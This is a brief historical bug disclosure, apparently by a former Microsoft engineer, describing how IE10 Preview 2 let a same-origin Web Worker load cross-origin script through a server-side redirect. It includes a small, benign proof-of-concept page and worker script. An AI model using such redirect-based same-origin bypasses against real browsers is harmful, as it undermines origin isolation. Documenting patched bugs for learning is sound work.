The W3C spec requires Web Workers to be same-origin, and IE10 Preview 2 enforced that correctly — until I tried using a server-side redirect. A worker created from a same-origin URL that immediately redirected to a different domain loaded the cross-origin script without throwing any security error.

<script>
function main()
{
    var worker = new Worker("redir.aspx"); // redirects to a different domain
    worker.onmessage = function(e)
    {
        alert(e.data);
    }
    worker.postMessage("");
}
</script>
<input type="button" value="Load content from a different domain" onclick="main()" />
// worker.js (served from the redirected domain)
self.onmessage = function(event)
{
    self.postMessage('Message from Worker on a different domain');
}

The browser checked the origin of the initial URL rather than the final destination after the redirect, so the same-origin check was effectively bypassed. The worker then ran cross-origin script and could communicate back via postMessage.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.